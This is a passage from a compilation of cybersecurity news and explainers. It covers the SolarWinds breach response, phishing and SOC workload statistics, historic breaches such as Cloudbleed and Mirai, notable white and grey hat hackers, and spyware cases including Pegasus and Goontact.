director of the Cybersecurity and Infrastructure Security Agency, told The Wall
Street Journal Friday. But he said investigators haven’t identified another company
whose products were broadly compromised to infect other firms the way
SolarWinds was.
SolarWinds’s investigations will be ongoing for at least several more weeks, and
possibly months, due to the sophistication of the campaign and actions taken by the
hackers to remove evidence of their activity, he said. SolarWinds has not
determined the exact date hackers first gained unauthorized access to the
company’s environment, though innocuous code changes were first made to Orion
in October 2019.

The hackers deleted programs following use to avoid forensic discovery and
masqueraded file names and activity to mimic legitimate applications and files, he
said. The hackers had automated dormancy periods of two weeks or more prior to
activation and utilized servers outside the monitoring authority of U.S. intelligence,
he said.

Going forward, Ramakrishna said SolarWinds plans to better secure its

environment and systems against vulnerabilities by: upgrading to stronger and
deeper endpoint protection; enhancing its data loss prevention offering to better
detect low and slow leaks; expanding its Security Operations Center to improve
visibility and threat hunting; and tightening its firewall policies to further limit
east/west traffic.

From a zero trust standpoint, he said SolarWinds plans to increase and strictly
enforce requirements for multi-factor authentication in its environment, and expand
the use of a privilege access manager for admin accounts. As for third-party
application access, SolarWinds plans to boost ongoing monitoring and inspection
of SaaS tools and increase the level of pre-procurement security reviews for all
vendors.

“While we believe our prior practices were representative of practices within the
broader software industry, armed with what we’ve learned about this attack, we’re
taking immediate steps to strengthen and protect our environment by implementing
additional security practices,” Ramakrishna said.

2. Financial Regulator Hit by 240,000 Malicious Emails in

Q4 2020

The UK’s financial regulator was bombarded with nearly a quarter of a million
malicious emails in the final quarter of 2020, FOI data has revealed, highlighting
the continuous pressure high-profile organizations are under to protect their assets.

Litigation firm Griffin Law filed the FOI request with powerful London-based
body the Financial Conduct Authority (FCA).

It revealed that the FCA was hit with 238,711 malicious and unsolicited emails
over the final three months of 2020, averaging out at around 80,000 per month.

November saw the highest volume (84,723), followed by October (81,799) and
December (72,288). The vast majority were classified as spam, with over 2400
containing malware including Trojans, spyware and worms, according to the
report.

The good news is that the FCA blocked all of these malicious emails sent its way,
although the real threat is not from mass automated campaigns but more highly
targeted spear-phishing attempts.

Tessian CEO, Tim Sadler, argued that phishing remains a major security problem
today because it’s easier to hack a human than it is to target software.
“Cyber-criminals, undoubtedly, want to get hold of the huge amounts of valuable
and sensitive information that FCA staff have access to, and they have nothing but
time on their hands to figure out how to get it,” he added.

“It just takes a bit of research, one convincing message or one cleverly worded
email, and a distracted employee to successfully trick or manipulate someone into
sharing company data or handing over account credentials.”

The regulator is far from faultless when it comes to cybersecurity: like many
organizations, human error has been its undoing in the past.

Back in February 2020 it apologized after accidentally posting personal

information including names, addresses and telephone numbers of some
individuals who had lodged complaints against the authority.

Ironically, the data leak occurred as part of its response to an FOI request.

3. SOC teams spend nearly a quarter of their day

handling suspicious emails

Security professionals know that responding to relentless, incoming streams of

suspicious emails can be a labor-intensive task, but a new study shared exclusively
with SC Media in advance indicates just how time-consuming it actually is.

Researchers at email security firm Avanan claim to have authored the “first
comprehensive research study” that quantifies the amount of time security
operations center (SOC) employees spend preventing, responding to, and
investigating emails that successfully bypassed default security and are flagged by
end users or other reporting mechanisms.

According to the study, email threats take two to three hours of a SOC team’s time
per day, or 22.9% of a SOC team’s daily routine. The data is based upon the
responses of more than 500 IT managers and leaders surveyed by Avanan. Of the
time spent managing emails threats, nearly half – 46.9% – was allocated toward
investigation, while response and prevention each took 26.6 percent of a SOC
team’s time.

Investigations take double the amount time for a number of reasons. For one, said
Friedrich, they often require “a bit of manual work in order to do the investigation”
because SOC analysts often don’t have all the information and analysis they need
in a single view or screen to decide in one quick step if an email is malicious or
not. Also, “sometimes it takes more than one person” to review an email to
determine its validity. Procedures may call for two or three people to render a
verdict, and the original email recipient may be brought into the investigation and
asked if they were expecting an email from the purported sender. 

According to the survey, the preventative tasks most commonly performed by SOC
teams are updating allow and block lists (79.6% of respondents), updating ATP
policies (64.9%) implementing new mail-flow rules (56%), updating sensitivity
and confidence settings (44.3%)  and updating signature files (28.9%).
Collectively, these and other tasks result in an average of 5.59 hours spent per
week on prevention.

As for whether email threats should take up less of a SOC team’s day – that may
be in the eye of the beholder.

“In our conversations with [Security Orchestration Automation & Response]

vendors… they said to us that 90% of the events they deal with are actually
phishing,” said Avanan co-founder and CEO Gil Friedrich. In that regard, SOC
workers condensing 90% of their work into 23% of their time sounds like good
efficiency.

But even if that’s the case, the report warns that managing email threats “is time-
consuming and costly for enterprises of all sizes. Between preventing malicious
email from causing damage to reviewing end-user suspicious email reports and
false positive reports, SOC employees are overwhelmed and overworked by the
sheer state of email, both good and bad. “

Friedrich warned that the nonstop influx of suspicious emails makes SOC
employees prone to alert fatigue. Indeed, according to the report, SOCs on average
receive 68.7 end-user reports per week and 3,574 in a year, spending about 7.7
minutes on each one. Of those, 33.8% are found to be malicious, and SOC
employees will spend a little over 49 days responding to them in a given year.

False positives also pose a problem. Avanan says that SOCs on average receive 16
release-from-quarantine requests per week, with 30.73% labelled as false positives.
SOC teams spend nearly 58 days per year handling an average of 6,862 such
requests.

SOC fatigue resulting from these reports and requests can result in “real phishing
attacks being released back to employees” inadvertently, said Friedrich. “The other
problem we see is that too often the SOC professional will not handle the threat;
they will [only] handle the email. So they will not look for the phishing campaign.
They would not look for similar emails [or ask] ‘Did I get anything else from that
sender? Should I create a blocklist?’”

“I need to do more than just block one email,” Friedrich said. But of course, taking
additional steps only adds more time to the equation.
And compounding the issue is the expanding use and abuse of workplace
communication and collaboration platforms such as Slack and Teams, which the
potential to eat into SOC analysts’ time even further. Indeed, 76.1% of respondents
agree or strongly agreed that Slack and Teams vulnerabilities would necessitate the
implementation of further security measures within the next eight months.

To help reduce the numbers of malicious emails that drop into SOC teams’ laps,
Friedrich suggested that companies using cloud-based email services consider
moving their email security to the cloud as well, because traditional solutions built
for on-premises email are “missing too much stuff.”

“The evolution of moving your email to the cloud is now being followed with the
second revolution of moving your security to a cloud-first approach that uses API
and cloud connectivity,” Friedrich continued. “You’ll get time back for your
SOC.”

Additional cybersecurity experts also offered their own recommendations.

“If a SOC is engaged in actual attacks that start by targeting their email system,
then they need to think about better managing that attack surface as a point of
infection,” said Chris Morales, head of security analytics at Vectra. “If a SOC is
spending too much time investigating alerts from detection and response that are
just noise, then they might want to consider a less noisy system.”

Also, “More companies are spending additional dollars on third-party services that
are specifically looking at email defense,” noted Joseph Neumann, director of
offensive security at Coalfire. “Automation and cloud sourcing defense to
organizations that specialize in this specific attack vector are the best value
add. Those organizations will be the first to develop and mature automation,
machine learning or possibly AI in the future.”

4. Hackers had access to SolarWinds email system for

months: report

Hackers involved in the recent breach of IT group SolarWinds, one of the largest
cyber incidents in U.S. history, likely had access to the company’s email system
for almost a year.

The Wall Street Journal reported late Tuesday that SolarWinds CEO Sudhakar

Ramakrishna said in an interview that the hackers had accessed at least one of
the company’s Office 365 email accounts in December 2019, beginning a chain of
email compromises for other accounts. 
“Some email accounts were compromised,” Ramakrishna told the publication.
“That led them to compromise other email accounts and as a result our broader
[Office] 365 environment was compromised.”

The new findings  further complicate the investigation into the SolarWinds breach,
first discovered this past December, which federal officials have attributed to
sophisticated Russian hackers. 

The breach potentially impacted up to 18,000 SolarWinds’ domestic and

international customers, including the Commerce, Defense, Energy, Homeland
Security, State and Treasury departments. President Biden discussed the massive
security breach during his first call in office with Russian President Vladimir
Putin last month, and ordered the U.S. intelligence community to assess the impact
of the breach. 

SolarWinds has taken steps to increase security after the incident, including hiring
a new cybersecurity consulting group headed by former Cybersecurity and
Infrastructure Security Agency Director Christopher Krebs and former Facebook
Chief Security Officer Alex Stamos.

Ramakrishna, who took over as SolarWinds CEO at the beginning of January, told
the Journal that his “attitude was to come in and assess first and figure out what we
needed to do” in his new position. 

The news came the same day Reuters reported that Chinese hackers had separately
inserted malicious code into SolarWinds software, successfully compromising the
Department of Agriculture’s National Finance Center and potentially other federal
agencies over the course of the past year. 

A spokesperson for SolarWinds stressed Tuesday that the Chinese hackers had

been able to access the SolarWinds Orion software through breaching the
customer’s network, and that the breach was “unrelated to SolarWinds.”

“We are aware of one instance of this happening and this is separate from the
broad and sophisticated attack that targeted multiple software companies as
vectors,” the SolarWinds spokesperson told The Hill.
Real Life Examples of Web Vulnerabilities
The Panama Papers incident (Apr 2016)

The Panama Papers are a collection of 11.5 million records from Mossack
Fonseca, originally leaked to German journalist Bastian Obermyer in
2015. Due to the sheer size of the data, the International Consortium of
Investigative Journalists were approached.

Why was this significant?

Many public figures, present and past, had their financial dealings
exposed, linking them to terrorists, drug cartels and tax havens. Some
public figures had their careers affected, and in some instances, the
information directly led to public unrest.
Department of Revenue Hack (2012)

A foreign hacker was reported to have stolen 387,000 credit card

numbers and 3.6 million Social Security numbers from the South Carolina
Department of Revenue.

Why was this significant?

IRS was hacked again in 2015, exposing people’s social security numbers,

address, incomes to more than 700,000 people. This information was then
further used to authenticate themselves to get transcripts of their victims,
resulting in more exposed data.

Even though in the first instance credit card data was encrypted, social
security numbers and other personally identifiable data were not.

Direct consequences of this incident would be the exposure of these people

to identity fraud. The 2017 Identity Fraud Study found that $16 billion was
stolen from 15.4 million U.S. consumers in 2016, and in the past six years
identity thieves have stolen over $107 billion.
How does this relate to broken authentication and session management /
sensitive data exposure?

The first breach in 2012 resulted from the default password set in the
authentication layer. In addition, the lack of encryption on some sensitive
data fields including the social security numbers increased the impact of
this incident.
A3. Sensitive Data Exposure 

Cloudbleed (2017)

Google’s Project Zero found an issue in Cloudflare’s edge servers made it

possible to dump memory potentially containing sensitive data, some of
which were cached by search engines. This security bug was named
Cloudbleed.

Why was this significant?

Cloudflare had acknowledged the leak could have started as early as 22

September 2016, and a private key between Cloudflare machines had
leaked. As nearly 6 million websites uses Cloudflare’s services, and many
web application defenses are built with the assumption of a secure TLS
communication channel, the impact could be large. Estimates from
Cloudflare state that between 22 September 2016 and 18 February 2017,
the bug was triggered 1,242,071 times.

Cloudflare did a small sample study, with a confidence level of 99% and a
margin of error of 2.5%, which showed a limited amount of sensitive data
exposed.
Android Studio, Eclipse, IntelliJ IDEA, APKTool (2017)

Check Point’s research team found vulnerabilities in popular Android

development and reverse engineering tools used by developers, engineers
and researchers. The issues found could lead to data exposure, as well as
malicious users taking over the devices running APKTool.

The proof-of-concept attack allowed showed that a malicious user could

inject the malicious code into shared online repositories such as those on
github, and allow the malicious user to obtain files available on the device
reading the code. Similarly, the popular compiler APKTool has a
vulnerability in the configuration yml file, allowing files to extracted
anywhere on the system running it.

Why was this significant?

This vulnerabilities could be used to target developer’s machines and

servers attempting to load, run, or decompile code.

In the development community, code or libraries are often shared in open

source repositories, and a attack like this could result in sensitive
documents such as credentials and source code to be exposed. Developers
using these popular IDEs could be led to leak sensitive files in this
manner.

In the second scenario, the APKTool exploit can lead to Remote Code
Execution and allowing a remote malicious user to take control of the
machine. For example, extracting a PHP exploit and calling the web server
to run it.

How does this relate to XML External Entities (XXE)?

Both attacks are due to the way XML and YML(a similar human-readable
data format) is parsed/read. The external reference contained in the XML
is processed without further checks, leading to the above issues.
Amazon S3/Mirai (Now / Aug 2016)

Amazon S3

Notably, in recent years, there has been numerous organizations who

failed to protect their Amazon S3 storage instance:

 Australian Broadcasting Corporation  (Nov 2017) — Leakage of

hashed passwords, keys and internal resources.
 United States Army Intelligence and Security Command (Nov 2017) 
— Various files, including Oracle Virtual Appliance (.ova). volumes
with portions marked top secret.
 Accenture (Sept 2017) — Authentication information, including
certificates, keys, plaintext passwords, as well as sensitive customer
information.
There is an extremely high likelihood that similar issues will continue to
be found.

Why was this significant?

A large number of organizations rely on Amazon’s S3 data storage

technology, including governments and military organizations. From past
examples found, this is a pervasive problem and the information leaked
often has a high impact on the organization affected. Having a CSPM
solution when you have cloud infrastructure will help monitor common
cloud misconfigurations.

Mirai( 未来)

Mirai was a botnet utilising IoT devices, managing to execute several high
profile attacks after discovery, with the creator going to ground after
releasing the code as open source (Anna-senpai).

Why was this significant?

Mirai ran from CCTV cameras, DVRs and routers. Essentially worked by
trying common passwords, something that can be easily avoided. The
entirety of the password list used is included below:

With such a simple method, the Mirai botnet produced 280 Gbps and 130
Mpps in DDOS capability, attacking DNS provider Dyn, leading to
inaccessibility of sites such as GitHub, Twitter, Reddit, Netflix and
Airbnb.

How does this relate to Security Misconfiguration?

Security misconfiguration can range from something as simple as allowing

excessive permissions to a user account, to failing to restrict resource
access to external addresses. In the cases mentioned above, they were
caused by misconfiguration of the passwords protecting the systems.\
5 Famous White Hat Hackers You Should Know
1.    Charlie Miller

Charlie Miller has an impressive resume, including a Ph.D. in Mathematics and five years of
experience as a hacker for the National Security Agency. However, those accomplishments
may not be the most compelling reasons why he’s one of the best white hat hackers in the
world.

Often regarded as the “Super Bowl of hacking,” CanSecWest’s annual PWN2OWN hacking
contest is incredibly difficult, and Miller has won the event four times. During his 2009
victory, he broke into a Macintosh in less than 10 seconds, improving his two-minute time
from the previous year. Additionally, Miller was the first to exploit the iPhone when it came
out, and he did the same for the first Android phone on the day it was released. In another
impressive accomplishment, Miller became the first person to exploit the iPhone remotely by
simply sending an SMS message.

Miller has also been active in automotive security. He and another hacker compromised
multiple cars, breaking into them remotely. Wired chronicled how they could infiltrate Fiat
Chrysler vehicles from anywhere in the country, CONTROLLING EVERYTHING from the
radio and brakes to transmission and steering. That demonstration led to a recall for 1.4
million vehicles.

2.    Tsutomu Shimomura

Like Charlie Miller, Tsutomu Shimomura has an impressive academic background and spent
time working for the National Security Agency. The first part comes as no surprise, as
Tsutomu Shimomura is the son of Osamu Shimomura, who won the Nobel Prize in
Chemistry in 2008 for discovering a specific protein in marine organisms. Tsutomu
Shimomura became a computational physics research scientist, leading to his stint with the
National Security Agency.

Few white hat hackers can match the caliber of Shimomura’s claim to fame, which was his
involvement with the FBI in capturing high-profile and then-criminal hacker Kevin Mitnick.
Those events led to Mitnick serving five years in prison. Shimomura co-wrote a book with
journalist John Markoff, “Takedown,” about how he out-hacked and then helped locate and
capture Mitnick. A 2000 film called “Track Down” was largely based on Shimomura’s book.

3.    Greg Hoglund

Anyone interested in hacking should know the name Greg Hoglund, although he isn’t as
well-known as he should be. A pioneer in early software security, Hoglund contributed a
great amount of research about vulnerabilities and rootkits, which are sets of software tools
used to gain control of computer systems.
One event that gained Hoglund notoriety was when he exposed a large vulnerability in the
popular massively multiplayer online role-playing game (MMORPG) World of Warcraft.
That played a role in Hoglund’s career as an author, which includes “Exploiting Online
Games,” “Rootkits: Subverting the Windows Kernel,” and the bestselling “Exploiting
Software: How to Break Code.”

Hoglund’s other accomplishments include writing one of the first network vulnerability
scanners, which was installed in over half of all Fortune 500 companies, and creating and
documenting the first Windows NT-based rootkit. He regularly speaks at security
conferences.

4.    HD Moore

As a teenager, HD Moore got his formal start in security research at the age of 17 when he
worked for the U.S. Department of Defense. Even though he didn’t have the proper security
clearance, he was able to provide useful code and apply his skills on CLASSIFIED
PROJECTS, according to an interview with cybersecurity website Dark Reading.

Moore has played a role in discovering several critical security vulnerabilities. Perhaps the
most famous is what he accomplished with the Metasploit Framework in 2003, an open-
source penetration testing platform for uncovering network weaknesses. It was one of the
most influential security inventions of the era. The platform was later acquired by Rapid7 in
2009.

The interview named Moore as the most famous white hat hacker. Given his involvement in
information security and the several dozen speaking engagements listed on his personal
webpage, that label may be reasonable.

5.    Dan Kaminsky

Dan Kaminsky has played a large role in fighting cybercrime since 2008, when he became
one of the most widely known white hat hackers. At that time, he found a serious DNS flaw
that would allow attackers to mount cache poisoning attacks on name servers. Nearly every
internet service uses DNS protocol, so the flaw had to be patched quickly. Within a few days
of the discovery, a patch was developed.

Kaminsky has also made other important discoveries. In 2009, he located and then fixed
several flaws in SSL protocol that enabled attackers to gain certificates for sites that they
don’t control. That same year, Kaminsky became one of the first people to determine that
hosts infected by Conficker, a computer worm, had a detectable signature.
5 scary Real -life cyber-attacks (Cyber terrorism)

1.  US Electricity grid

The US electricity grid was attacked in late 2017, an event described by the FBI and
Department of Homeland Security as “a multi-stage intrusion campaign by cyber actors
who…..conducted spear phishing, and gained remote access into energy sector
networks. After obtaining access, they conducted network reconnaissance, moved
laterally, and collected information pertaining to Industrial Control Systems.”
The threat wasn’t completely unexpected — DHS had been warning utility
providers about the potential threat since 2014 — but highlighted the possibility of
the lights going out across the country. "They got to the point where they could
have thrown switches and disrupted power flows” said Jonathan Homer, a department
analyst.   
Large-scale disruption isn't far-fetched: in December 2015 a power cut in Western
Ukraine affected 250,000 residents and was attributed to Russian hackers — in a move
that many considered a dry-run of a possible attack on the US.  

2.  Federal Aviation Administration

No one wants to read the headline "Cyber-Attack Causes Plane to Fall from the
Sky", and thankfully we haven’t yet had to. But an attack on the FAA in 2015 was a
reminder of how vulnerable air space is. The FAA handles 43,000 flights carrying 2.6
million airline passengers across 29 million square miles of airspace every day and
relies on over 100 different technology systems to do so; a breach to any of them
being potentially fatal.
Although the 2015 event targeted administrative systems and was quickly
contained, it raised the specter of hackers shutting down radar or sending false
information to aircraft systems — concerns that were echoed in a report following the
incident.   

3.  SWIFT
If you've ever moved money between banks (and that’s pretty much all of us)
you've almost certainly used SWIFT, a secure messaging service that enables
financial transactions between 11,000 financial institutions in over 200 countries,
and handles 32 million messages, amounting to several  trillion dollars, every day.

While breaching individual financial service providers requires a lot of effort,

finding a way in through a connected network like SWIFT offers a lot more bang
for your buck.  

Trust and integrity are central to SWIFT’s business model, but in 2015 those
values were overturned with a series of real-life cyber-attacks that resulted in sizable
losses. The main attack centered on the Bangladesh Central Bank (BCB), with
criminals attempting an eye-watering theft of $1 billion. 
The bad actors used the SWIFT network to fool the US Federal Reserve into
transferring them BCB funds. (It's not uncommon for the US Fed to hold
international banking assets.) As a basic security check, SWIFT sends details of
any transfer to the printers of the financial institution behind the request.
Under normal circumstances, with that added layer of review in place, when a
BCB official sees a request of that size he or she would stay the transfer until
confirmation can be had. (Especially if — as was the case here — the funds are
being sent to an unknown account) In order to get the attack out of the gate
successfully, therefore, the attackers cleverly used malware to disable the bank's
printers.
In the end, the full attack was thwarted, but $81 million still went missing!

4.  United States Central Command

Back in 2008, US Central Command (CENTCOM) was the military center for the
United States military’s Middle East operations. A USB drive, found in a parking
lot and containing the [Link] worm, was inserted into a laptop connected to the
CENTCOM network. From there it spread undetected to other systems, both
classified and unclassified.

Opinion is divided as to what information the worm found, and what it was able to
do with it. While it could open backdoors on infected computers, the classified
computer network wasn’t connected to the internet – meaning that it got the chance
to spread too fast and too far to be contained.
Nevertheless, the event was a wakeup call and was described by the Pentagon as
“the most significant breach of U.S. military computers ever”. They banned the use
of portable drives immediately and spent fourteen months removing all traces of
the worm. 
Since the incident occurred over 10 years ago, it’s tempting to think it won’t be
repeated, but that idea, comforting as it may be, is a fantasy. A recent report on
national cybersecurity found that 74% of 95 federal agencies reviewed were either
"At Risk" or "At High Risk" of attack, the latter designation meaning
that immediate intervention is required.   

5.  US Healthcare Network

Healthcare providers must be particularly vigilant about protecting
themselves since the sector attracts more than its fair share of attacks. Most
attacks stem from lone wolves or small-scale criminal affiliates, but the SamSam
ransomware attacks challenge that norm – suggesting hostile state involvement.

The ransomware attacks took place over three years, extorting $6 million in
payments and resulting in $30 million in damages. All told, only seven of the US’
50 states escaped totally unscathed. That said, there’s still a high probably that
there are other victims out there who have not disclosed their attacks or may not
even be aware of them yet.

SamSam has been around since 2016, with security company Sophos reporting

that attacks have occurred daily since the malware first arrived on the scene. It’s
estimated healthcare accounts for about a quarter of all attacks.
Some of the prominent victims included Hollywood Presbyterian Medical
Center, (which had to turn patients away before capitulating and paying the
ransom), LabCorp (the nation's largest diagnostic blood testing company),
and Kansas Heart Hospital (which paid the initial ransom and were then hit by
another demand).

Although there were no recorded fatalities attributable to the attacks, it’s only a
matter of time before a series of coordinated attacks like this one, results in such an
outcome. 
In November 18, US Federal prosecutors indicted two Iranian hackers. “The
allegations in the indictment… outline an Iran-based international computer
hacking and extortion scheme that engaged in a 21st-Century digital
blackmail,” said US assistant attorney general Brian Benczkowski. 
There are two particularly worrying aspects of this attack:
 The likely involvement of a hostile government that has ample resources to
mount similar attacks again and again.
 The extended time period — over three years! — during which attacks took
place, without drawing any suspicion of a connection.

What is Spoofing?

Spoofing is a fraudulent act in which communication from an unknown source is

disguised as being from a source that is known to and trusted by the recipient. A
spoofing attack occurs when a person (referred to as a spoofer) pretends to be
someone else in order to trick their target into sharing their personal data or
performing some action on behalf of the spoofer. The spoofer will often take time
and make an effort to build trust with their target, thus ensuring that they will share
their sensitive data more easily.
As a type of impersonation carried out via technological means, spoofing can take
on many forms. In its most primitive form, spoofing refers to impersonation via
telephone. For example, when a caller on the other end falsely introduces
themselves as a representative of your bank and asks for your account or credit
card info, you are a victim of phone spoofing. To make their fake calls seem more
believable, spoofers have also started using software to fake caller IDs, an act
known as phone number spoofing.

Real life examples of Spoofing Attacks

Some of the best-known examples of spoofing attacks include the following:

 In 2006, unknown hackers carried out a major DNS spoofing attack – the
first of its kind – against three local banks in Florida. The attackers hacked
the servers of the internet provider that hosted all three websites and
rerouted traffic to fake login pages designed to harvest sensitive data from
unsuspecting victims. This has allowed them to collect an undisclosed
number of credit card numbers and PINs along with other personal
information belonging to their owners.
  In June 2018, hackers carried out a two-day DDoS spoofing attack against
the website of the American health insurance provider, Humana. During the
incident that was said to have affected at least 500 people, the hackers have
managed to steal complete medical records of Humana’s clients, including
the details of their health claims, services received, and related expenses.
 In 2015, unidentified hackers have used DNS spoofing techniques to
redirect traffic from the official website of Malaysia Airlines. The new
homepage showed an image of a plane with the text “404 – Plane Not
Found” imposed over it. Although no data was stolen or compromised
during the attack, it blocked access to the website and flight status checks
for a few hours.

What is a Grey Hat Hacker?

A grey hat hacker is an individual who employs illegal means to discover threats
even though he/she does not share the malicious intent commonly attributed to
black hat hackers. Grey hat hackers occupy the middle ground that lies between
white hat hackers who aim to protect systems and networks from attacks and black
hat hackers who exploit vulnerabilities for malicious gain. In essence, a grey hat
hacker looks for vulnerabilities without the hardware or software manufacturer’s
permission to spread awareness about his/her findings.

Grey hat hackers are like modern-day Robin Hoods who are willing to forgo ethics
and laws for the greater good.

Notable Examples of Grey Hat Hacking

ASUS Routers

In 2014, a grey hat hacker successfully accessed thousands of ASUS routers to

warn users about potentially exposing their files if they don’t patch the
vulnerability he discovered. 
Linux Routers

A team of grey hat hackers known as the “White Team” identified a security hole
in specific Linux router models in 2015. To remedy the flaw, the group released a
malware that would allow affected users to plug the security gap.

Online Printers

Back in 2017, a grey hat hacker remotely operated more than 150,000 printers to
warn their users about the risks of leaving online printers exposed.

MikroTik Routers

Russian grey hat hacker Alexey patched over 100,000 MikroTik routers to prevent
cryptocurrency miners from exploiting a vulnerability.

While these grey hat hackers had no malicious intentions, the invasion of privacy
they committed was not well-received.

What Is Spyware?

Spyware is malicious software that infects computers and other internet-connected devices
and secretly records your browsing habits, the websites you visit, and your online purchases.
Some types of spyware also record your passwords, login credentials, and credit card details.
This information is then forwarded to the spyware author, who can either use it for their own
personal gain or sell it to a third party.
Like all other types of malicious software, spyware is installed on your computer without
your consent. It is usually bundled with legitimate software that you have intentionally
downloaded (like file-sharing programs and other freeware or shareware applications), but
you can also unwittingly download it by visiting malicious websites or clicking on links and
attachments in infected emails. As soon as you install it, spyware will attach itself to your
operating system and start running quietly in the background.
The term spyware was coined in the mid-1990s, but the software itself had existed long
before that. At first, developers would add a spyware component to their programs to track
their usage. They would then approach potential advertisers with these stats or utilize them to
detect any unlicensed use of the software. By the early noughties, however, more than 90
percent of computer users worldwide had their machines infected with some form of
spyware, unknowingly installed without their permission.
Nowadays, there are many spyware programs in circulation, some even bundled with
hardware. Rather than targeting individual users, the creators of spyware aim to gather as
much data as possible and sell it to advertisers, spammers, scammers, or hackers. With new
forms of malicious software being released every few seconds, no one is safe from spyware.
Even the companies you trust use spyware to track your behavior, which you have allowed
them to do when you accepted their End User License Agreement.

Real life Examples of Spyware 

1. New Android spyware targets users in Pakistan

SophosLabs has discovered a small cluster of Trojanized versions of Android apps,

mainly marketed to people who live in Pakistan. Someone has modified these
otherwise legitimate apps (clean versions are available for download on the Google
Play Store) to add malicious features that seem completely focused on covert
surveillance and espionage.

The modified apps look identical to their legitimate counterparts, and even perform
their normal functions, but are designed to, initially, profile the phone, and then
download a payload in the form of an Android Dalvik executable (DEX) file. The
DEX payload contains most of the malicious features, which include the ability to
covertly exfiltrate sensitive data like the user’s contact list and the full contents of
SMS messages. The app then sends this information to one of a small number of
command-and-control websites hosted on servers located in eastern Europe.

The selection of apps is highly peculiar, as they are neither the most popular, nor
particularly unique, apps. There’s no indication that the publishers of the original
apps are aware that these Trojanized versions even exist. The highest-profile app
Trojanized in this way is the Pakistan Citizen Portal app, published by the
government of Pakistan, but the Trojanized version never appeared in any
legitimate market, as far as we know. (SophosLabs made multiple attempts to
disclose this information to the government of Pakistan, the publisher of the app,
prior to publication.)

2. Dozens of journalists’ iPhones hacked with NSO ‘zero-click’ spyware,

says Citizen Lab

For more than the past year, London-based reporter Rania Dridi and at least 36
journalists, producers and executives working for the Al Jazeera news agency were
targeted with a so-called “zero-click” attack that exploited a now-fixed vulnerability
in Apple’s iMessage. The attack invisibly compromised the devices without having
to trick the victims into opening a malicious link.
Citizen Lab, the internet watchdog at the University of Toronto, was asked to
investigate earlier this year after one of the victims, Al Jazeera investigative
journalist Tamer Almisshal, suspected that his phone may have been hacked.
In a technical report out Sunday and shared with TechCrunch, the researchers say
they believe the journalists’ iPhones were infected with the Pegasus spyware,
developed by Israel-based NSO Group.
The researchers analyzed Almisshal’s iPhone and found it had between July and
August connected to servers known to be used by NSO for delivering the Pegasus
spyware. The device revealed a burst of network activity that suggests that the
spyware may have been delivered silently over iMessage.
Logs from the phone show that the spyware was likely able to secretly record the
microphone and phone calls, take photos using the phone’s camera, access the
victim’s passwords and track the phone’s location.
Citizen Lab said the bulk of the hacks were likely carried out by at least four NSO
customers, including the governments of Saudi Arabia and the United Arab
Emirates, citing evidence it found in similar attacks involving Pegasus.
The researchers found evidence that two other NSO customers hacked into one and
three Al Jazeera phones respectively, but that they could not attribute the attacks to a
specific government.
A spokesperson for Al Jazeera, which just broadcast its reporting of the hacks, did
not immediately comment.
NSO sells governments and nation-states access to its Pegasus spyware as a
prepackaged service by providing the infrastructure and the exploits needed to
launch the spyware against the customer’s targets. But the spyware maker has
repeatedly distanced itself from what its customers do and has said it does not know
who its customers target. Some of NSO’s known customers include authoritarian
regimes. Saudi Arabia allegedly used the surveillance technology to spy on the
communications of columnist Jamal Khashoggi shortly before his murder, which
U.S. intelligence concluded was likely ordered by the kingdom’s de facto ruler,
Crown Prince Mohammed bin Salman.
Citizen Lab said it also found evidence that Dridi, a journalist at Arabic television
station Al Araby in London, had fallen victim to a zero-click attack. The researchers
said Dridi was likely targeted by the UAE government.
In a phone call, Dridi told TechCrunch that her phone may have been targeted
because of her close association to a person of interest to the UAE.
Dridi’s phone, an iPhone XS Max, was targeted for a longer period, likely between
October 2019 and July 2020. The researchers found evidence that she was targeted
on two separate occasions with a zero-day attack — the name of an exploit that has
not been previously disclosed and for which a patch is not yet available — because
her phone was running the latest version of iOS both times.
“My life is not normal anymore. I don’t feel like I have a private life again,” said
Dridi. “To be a journalist is not a crime,” she said.
Citizen Lab said its latest findings reveal an “accelerating trend of espionage”
against journalists and news organizations, and that the growing use of zero-click
exploits makes it increasingly difficult — though evidently not impossible — to
detect because of the more sophisticated techniques used to infect victims’ devices
while covering their tracks.
When reached on Saturday, NSO said it was unable to comment on the allegations
as it had not seen the report, but declined to say when asked if Saudi Arabia or the
UAE were customers or describe what processes — if any — it puts in place to
prevent customers from targeting journalists.
“This is the first we are hearing of these assertions. As we have repeatedly stated, we
do not have access to any information related to the identities of individuals upon
whom our system is alleged to have been used to conduct surveillance. However,
when we receive credible evidence of misuse, combined with the basic identifiers of
the alleged targets and timeframes, we take all necessary steps in accordance with
our product misuse investigation procedure to review the allegations,” said a
spokesperson.
“We are unable to comment on a report we have not yet seen. We do know that
CitizenLab regularly publishes reports based on inaccurate assumptions and without
a full command of the facts, and this report will likely follow that theme NSO
provides products that enable governmental law enforcement agencies to tackle
serious organized crime and counterterrorism only, but as stated in the past, we do
not operate them. Nevertheless, we are committed to ensuring our policies are
adhered to, and any evidence of a breach will be taken seriously and investigated.”
Spokespeople for the Saudi and UAE governments in New York did not respond to
an email requesting comment.
The attacks not only puts a renewed focus on the shadowy world of surveillance
spyware, but also the companies having to defend against it. Apple rests much of its
public image on advocating privacy for its users and building secure devices, like
iPhones, designed to be hardened against the bulk of attacks. But no technology is
impervious to security bugs. In 2016, Reuters reported that UAE-based
cybersecurity firm DarkMatter bought a zero-click exploit to target iMessage, which
they referred to as “Karma.” The exploit worked even if the user did not actively use
the messaging app.
Apple told TechCrunch that it had not independently verified Citizen Lab’s findings
but that the vulnerabilities used to target the reporters were fixed in iOS 14, released
in September.
“At Apple, our teams work tirelessly to strengthen the security of our users’ data and
devices. iOS 14 is a major leap forward in security and delivered new protections
against these kinds of attacks. The attack described in the research was highly
targeted by nation-states against specific individuals. We always urge customers to
download the latest version of the software to protect themselves and their data,”
said an Apple spokesperson.
NSO is currently embroiled in a legal battle with Facebook, which last year blamed
the Israeli spyware maker for using a similar, previously undisclosed zero-click
exploit in WhatsApp to infect some 1,400 devices with the Pegasus spyware.
Facebook discovered and patched the vulnerability, stopping the attack in its tracks,
but said that more than 100 human rights defenders, journalists and “other members
of civil society” had fallen victim.

3. New Goontact spyware discovered targeting Android and

iOS users

Security researchers have discovered a new malware strain with spying and
surveillance capabilities —also known as spyware— that is currently available in
both Android and iOS versions.
Named Goontact, this malware has the ability to collect from infected victims data
such as phone identifiers, contacts, SMS messages, photos, and location
information.
Detected by mobile security firm Lookout, the Goontact malware is currently
distributed via third-party sites promoting free instant messaging apps dedicated to
reaching escort services.

The target audience of these sites appears to be limited at the moment to Chinese
